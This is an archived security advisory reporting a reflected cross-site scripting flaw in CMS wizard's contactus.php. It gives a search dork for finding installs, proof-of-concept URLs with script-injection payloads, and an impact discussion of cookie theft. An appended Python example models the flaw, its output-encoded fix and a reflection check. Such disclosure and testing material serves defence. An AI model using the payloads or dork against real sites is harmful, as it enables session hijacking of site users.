SECURITYVULNS:DOC:27694
Published: Feb 22, 2012 - 12:00 a.m. (2012-02-22 00:00:00)
Source: vulners.com

CMS wizard Cross Site Scripting

=================================================================
-=CMS wizard Cross Site Scripting

##########################################################

Author: XaDaL

Date: 14-02-2012

vendor: http://www.cmswizard.co.uk/

tested on: windows mobile

dork : powered by CMS wizard

##########################################################

This vulnerability affects /contactus.php.

##The impact of this vulnerability
This is a reflected cross-site scripting flaw: part of the request URI is echoed into the page without output encoding, so an attacker who gets a user to open a crafted link can inject JavaScript, VBScript, ActiveX, HTML or Flash into the page the application serves. Script running in the page can read the session cookie and take over the account, impersonating the user, or rewrite the content the user sees (for example to harvest credentials through a fake form). Cookies flagged HttpOnly are not readable from document.cookie, which blunts the cookie-theft payload shown below but not the page-rewriting attack.

##Attack details
The URI (the path appended after /contactus.php) was set to

    "><script>alert(document.cookie)</script>

or

    "><script>alert(/XaDaL_GantenG/)</script>

or other similar payloads. The leading "> is meant to close the quoted attribute value the path is reflected into, so that the script element that follows lands in the HTML body.

##=XSS=

http://localhost/contactus.php/"><script>alert(document.cookie)</script>

http://localhost/contactus.php/"><script>alert(/XaDaL_GantenG/)</script>
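As an added example (this is not code from the advisory or from the CMS wizard vendor, whose source is not shown here), the following Python models the kind of template that would produce the behaviour above, the output-encoded fix, and a check that tells the two apart using the advisory's own payload. The vulnerable rendering is an assumed pattern: the request path dropped unescaped into a form's action attribute, the PHP equivalent of action="<?php echo $_SERVER['PHP_SELF']; ?>". The probe-URL helper percent-encodes the payload the way a browser does when it is placed in the path; that the server decodes it again before reflecting it is likewise assumed.

```python
import html
from urllib.parse import quote

# Payload exactly as printed in the advisory, decoded from its HTML-entity form.
ADVISORY_ENCODED = "&quot;&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;"
PAYLOAD = html.unescape(ADVISORY_ENCODED)


def render_vulnerable(request_path: str) -> str:
    """Assumed vulnerable pattern (hypothetical; the real contactus.php is not on
    the page): the request path is written verbatim into a quoted attribute."""
    return (
        '<form method="post" action="' + request_path + '">'
        '<input name="email"><input type="submit"></form>'
    )


def render_fixed(request_path: str) -> str:
    """Same template with the path HTML-encoded for an attribute context,
    the equivalent of htmlspecialchars($path, ENT_QUOTES) in PHP."""
    safe = html.escape(request_path, quote=True)
    return (
        '<form method="post" action="' + safe + '">'
        '<input name="email"><input type="submit"></form>'
    )


def reflects_unescaped(body: str, payload: str = PAYLOAD) -> bool:
    """Reflection check: the raw payload appearing verbatim in the response body
    means the attribute was closed and a script element was injected."""
    return payload in body


def build_probe_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Build the request a browser actually sends for the advisory's URL:
    the payload sits in the path after contactus.php, percent-encoded."""
    return base_url.rstrip("/") + "/" + quote(payload, safe="")


if __name__ == "__main__":
    # What the server sees after decoding the path component.
    path = "/contactus.php/" + PAYLOAD
    print("probe URL:", build_probe_url("http://localhost/contactus.php"))
    print("vulnerable template reflects payload:", reflects_unescaped(render_vulnerable(path)))
    print("fixed template reflects payload:     ", reflects_unescaped(render_fixed(path)))
```

Against a live target, reflects_unescaped would be run on the HTTP response body for the probe URL; if the first form action in the response contains the raw "> sequence rather than &quot;&gt;, the path is being reflected without attribute encoding.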

!#GREETZ:
kamtiez , 1bli3z , tukulesto , hakz , jundab ,boebefa ,ryan aby , albert wired ,dr.CruzZ
xr0b0t , red r0b0t,El-Farhatz,s1do3l,virgi maho. and everyone else I can't mention one by one (o,0)v

all member magelangcyber , indonesiancoder , codenesia,kill-9,MC-crew.

and aya i love you full :*

#Bogel & dicka cyber: let's grab coffee together again sometime, bro =))

Happy fvcklentine…

flaunting your willy hhhhhhhhhh :p